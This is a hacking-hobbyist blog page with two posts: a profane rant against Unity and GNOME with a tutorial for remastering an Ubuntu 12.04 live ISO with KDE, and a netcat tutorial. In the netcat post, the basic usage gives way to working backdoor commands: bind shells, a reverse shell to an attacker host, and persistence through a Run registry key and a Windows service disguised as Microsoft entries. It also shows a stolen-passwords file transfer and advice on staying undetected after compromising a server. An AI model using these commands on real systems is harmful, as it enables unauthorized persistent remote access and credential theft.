Good bye Gnome 3 , UNITY and we are Getting back to KDE ( Ubuntu live cd customization )

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

We all know Ubuntu Unity and Gnome-shell are sucks and crazy. They think we are 7 years kids who love the flash,nice images etc . So I am not going to use Gnome(Not too bad but enough sucks) or Fucking UNITY. Perhaps they are also permanent Windows users lol. And now trying to ripping off the Windows. So I customised my Ubuntu 12.04 and installed KDE based Interface. KDE is nice GUI and many distro such as Debian,Red hat enterprise, OpenSuse, Kubuntu Linux, Arch Linux  etc has the KDE for default use. Ubuntu live cd customization is not too hard. If you want to customize your ISO just follow this tutorial.
Do you believe that I did not even able to take all the screenshot when wrote this articles ? Perhaps I can’t and i don’t want to try. I don’t think so, any power users or pentester will use GNOM 3 or UNITY. When I installed GNOME-SHELL on Ubuntu 12.04 and i saw it is able back to the classic style but still the classic style also sucks but use-able somehow.
Frankly, I used KDE and Gnome both. when I installed Ubuntu 11.10 and 12.04 it just makes me cry!!
Anyway, If you don’t want to install the KDE,XFCE or other interface over and over whenever you install the fresh OS. If you decide to make your own ubuntu based Linux distro and install some hacking/pentesting tools on the CD  then this tutorial is for you.
First Install :
sudo apt-get install squashfs-tools genisoimage
Now we create a folder for our work:
mkdir kde-linux
Move or copy the iso to your working folder:
mv ubuntu-12.04-desktop-i386.iso kde-linux/
and
cd kde-linux
Now we need to mount the ISO. So first we create a folder:
mkdir mout
Now we mount the sucks ISO to mnt directory:
mount -o loop ubuntu-12.04-desktop-i386.iso mout
extract the ISO into a direcotry:
mkdir extracted
rsync --exclude=/casper/filesystem.squashfs -a mout/ extracted
Extracted the sqashfs filesystem and this will take some times, So wait:
unsquashfs mnt/casper/filesystem.squashfs
When extraction is 100% then just run the following command simply:
mv squashfs-root edit
What we need now? Now we chroot to be root for fully customization . But let’s do something before doing it.:
cp /etc/resolv.conf edit/etc/
cp /etc/hosts edit/etc/
mount --bind /dev/ edit/dev
 
 
Now Chroot so that you can install anything you want , lol install some hacking tools too hehe:
chroot edit

Anyway, Now we need to mount :

mount -t proc none /proc
mount -t sysfs none /sys
mount -t devpts none /dev/pts

And run blindly:
export HOME=/root
export LC_ALL=C
We are almost done correctly then all things. Now we need :
#dbus-uuidgen > /var/lib/dbus/machine-id
dpkg-divert --local --rename --add /sbin/initctl
ln -s /bin/true /sbin/initctl
 
Now we can install anything we want… So let’s install KDE first (kde-plasma-desktop,kde-full,kubuntu-desktop)
first we run :apt-get update
now lets run:
apt-get install kde-plasma-desktop
Oh shit, I get errors which maybe on your ISO or may not(Not sure!):

apt-get install kde-plasma-desktop
Reading package lists… Done
Building dependency tree
Reading state information… Done
E: Unable to locate package kde-plasma-desktop
So I saw  the sources.list:
nano /etc/apt/sources.list
and I get only 3 source .
And I quickly copy all the source from installed Ubuntu
::::
gedit /etc/apt/sources.list
Just copy all the source and paste to your editing sources.list
or you can completely replace the file by “cp” command.
Now run again apt-get update
search the software which we are going to install:
apt-cache search kde-plasma-desktop

 kde-plasma-desktop – KDE Plasma Desktop and minimal set of applications
apt-get install kde-plasma-desk
or you can just install kde-full:
apt-get install kde-full
Sucks , It will download 103 Megabyte. So Let’s wait until it finish. But if you want to kde-full or kubuntu-desktop then it will download a lot. I prefer the minimal as I just want to leave the Gnome.
Anyway, If you want to install any other software :
apt-get install packagename #such asapt-get install vlc
apt-get install nmap
apt-get install skipfish
apt-get install gimp ksnapshot sqsh
If you want to install some deb file downloaded from internet then just copy the file to a folder ubuntu-kde/edit/somefolder. Example:

cp skype.deb ubuntu-kde/edit/home/somefolder

Now go to your chrooted terminal and : 

cd /home/somefolder                                     

dpkg -i skype.deb

Now we installed all necessary and it is time to build the ISO. Just we need to remove everything what created :
rm -rf /tmp/* ~/.bash_history                                                                
rm /etc/hosts
rm /etc/resolv.conf
rm /var/lib/dbus/machine-id
rm /sbin/initctl        
dpkg-divert --rename --remove /sbin/initctl
So now we need to umount what whatever we mounted .
umount /proc                                                                                 
umount /sys
umount /dev/pts
exit
sudo umount edit/dev   
                                                                                             
 
 
Now the real things blindly do:
chmod +w extracted/casper/filesystem.manifest

chroot edit dpkg-query -W --showformat='${Package} ${Version}n' > extracted/casper/filesystem.manifest

cp extract-cd/casper/filesystem.manifest extract-cd/casper/filesystem.manifest-desktop

sed -i '/ubiquity/d' extracted/casper/filesystem.manifest-desktop

sed -i '/casper/d' extracted/casper/filesystem.manifest-desktop
Now we compress the filesystems :
mksquashfs edit extracted/casper/filesystem.squashfs  (It will take some time)
We need to update the size otherwise it will not match the correct installation when installing. So lets update the size :
printf $(sudo du -sx --block-size=1 edit | cut -f1) > extracted/casper/filesystem.size 
Now :
cd extracted
rm md5sum.txt
find -type f -print0 | sudo xargs -0 md5sum | grep -v isolinux/boot.cat | sudo tee md5sum.txt
We are almost done :
 mkisofs -D -r -V "$IMAGE_NAME" -cache-inodes -J -l -b isolinux/isolinux.bin -c isolinux/boot.cat -no-emul-boot -boot-load-size 4 -boot-info-table -o ../your-new-linux-name.iso .
Now just burn the ISO into a blank DVD and Enjoy.
If you want to customize the Boot splash then you need more advance knowledge. Because Boot splash is related with plymouth( /lib/plymouth) and kernel.
I say Good Bye UNITY AND GNOME !!!! You made the power users crazy. Try to develop it soon.

Email me if you have any questions. 

Power of netcat

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Netcat actually is not a hacking tool. It is a networking tool. We can use it to communicate with other computers remotely, transferring data,Chatting etc. But We can also use it as Backdoor or hacking tool, For example “ping” is not hacking or DoS tool but we can DoS using “Ping” …no? So we can’t call it DDOSER tool.

 Anyway, Often netcat is called as “Swiss Army Knife” 

I will explain the basic usage of it now


All option in netcat:

nc -h
[v1.10-38]
connect to somewhere:   nc [-options] hostname port[s] [ports] …
listen for inbound:     nc -l -p port [-options] [hostname] [port]
options:
        -c shell commands       as `-e’; use /bin/sh to exec [dangerous!!]
        -e filename             program to exec after connect [dangerous!!]
        -b                      allow broadcasts
        -g gateway              source-routing hop point[s], up to 8
        -G num                  source-routing pointer: 4, 8, 12, …
        -h                      this cruft
        -i secs                 delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
        -l                      listen mode, for inbound connects
        -n                      numeric-only IP addresses, no DNS
        -o file                 hex dump of traffic
        -p port                 local port number
        -r                      randomize local and remote ports
        -q secs                 quit after EOF on stdin and delay of secs
        -s addr                 local source address
        -T tos                  set Type Of Service
        -t                      answer TELNET negotiation
        -u                      UDP mode
        -v                      verbose [use twice to be more verbose]
        -w secs                 timeout for connects and final net reads
        -z                      zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. ‘ftp-data’).

We can use netcat as backdoor, banner grabbing, port scanning, chatting, file transfer, traffic redirection etc.

Banner Grabbing :

root@linux:~# nc -vvv 192.168.96.129 80
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 80 (www) open
GET / HTTP/1.1

HTTP/1.1 400 Bad Request
Date: Sat, 14 Apr 2012 07:20:01 GMT
Server: Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1
Content-Length: 368
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.21 (Win32) mod_ssl/2.2.21 OpenSSL/1.0.0e PHP/5.3.8 mod_perl/2.0.4 Perl/v5.10.1 Server at localhost Port 80</address>
</body></html>
 sent 16, rcvd 617

How: nc -vvv ip port . Then Hit enter twice.

Simply we see The version of Web server is Apache 2.2.21 (Wind32) . Not only that , We can see OpenSSL version, PHP version etc. Do you know how a scanner scan for vulnerability against a target? The Scanner first find the version of server/application, then check on the local database(For example nessus,acunetix etc). We also can start Google search vulnerability for specific version …. no?

The same way we can find other application version, information:

 root@linux:~# nc -vvv 192.168.96.129 21
192.168.96.129: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.96.129] 21 (ftp) open
220 FileZilla Server version 0.9.39 beta written by Tim Kosse (Tim.Kosse@gmx.de) Please visit http://sourceforge.

 
You can try to connect to any port excluding 443 since netcat can’t communicate over ssl. Or do the tunneling.

Chat with your Hacker friend:

Suppose there are two hacker called hacker1 and hacker2. They don’t want to get caught for using other messenger, or they just do private communication.

How they are doing this ? Simple command :

hacker1(Netcat listening):

nc -vvv -l -p 44444

-vvv stand for verbose(as much as possible)

-l for listening(Opening the port to connect)

-p for port(any specific port to connect)

hacker2(Connecting to hacker1):

nc -vvv 192.168.96.129 4444   (4444 is the port)

hacker1

                                                                            hacker2

Transfer the File:

Hackers do not want to transfer the file via public file sharing server because of risk. But they can use netcat for transfer the file .

Suppose hacker1(Blackhat) has some passwords file on his computer ( 192.168.96.129) and want to transfer the file to hacker2( 192.168.1.213).

Hacker1 netcat command was:

nc -vvv -l -p 4444 <passwords.txt

hacker2 netcat command was:

nc -vvv 192.168.96.129 >passwords.txt

             
Let’s do a port scan using netcat:

we can scan port with simple command nc -vvv targetip 1-65535

or

 nc -vvv -z targetip 1-65535

  Here  extra “-z” option use Input output method.

simple to create a backdoor using netcat:

windows server mode:

nc -L -p 1337 -e cmd.exe

-L don’t die.
-e start command line.

Linux/Unix server mode:

nc -l -p 1337 -k -e /bin/bash

-k don’t die
-e command mode.

Connect to the server:

nc -vv targetip 1337

How about Reverse connection? Try the following on victim machin:

nc -e cmd -d attackerip  1337

On your  own computer(Attacker):

nc -vv -l -k -p 1337

Now you are thinking that how hacker can install the netcat on victim computer… right? ..

1. They first compromise the target system/server. And they want permanent access to the victim machine. So only way is uploading backdoor, setting it as start up application.                                                                                    
2. They create a batch file or shell script or downloader. Then sends it to the victim(Undetected by AV). Whenever the victim click on the script/batch it start downloading, installing etc automatically.

So how you make the netcat as stealth backdoor? Answer is by editing registry or moving to startup folder. Suppose you compromised an IIS web server and uploaded cmdasp.asp backdoor. Now you want to install the netcat as a stealth backdoor for some reason().

Netcat as start up backdoor:

Run this command:

reg add HKLMSoftwareMicrosoftWindowsCurrentVersionRun /v microsoft_service /t REG_SZ /d “c:nc.exe -d targetip 1337 -e cmd.exe”

Create a netcat listener on your local computer . Whenever the victim reboot his computer, he will get connected to you.

How about netcat as services ? try:

sc create microsoft_update binpath=”cmd /K start c:nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore 

Now try to make the backdoor to connect to you (hint: at).

By the way, you can do much more with netcat . netcat is not so bad as a backoor and if you can edit the C code netcat then it can be a supper backdoor. 
Try more….

More about it:

www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
en.wikipedia.org/wiki/Netcat
www.securityfocus.com/tools/139  (Download for windows)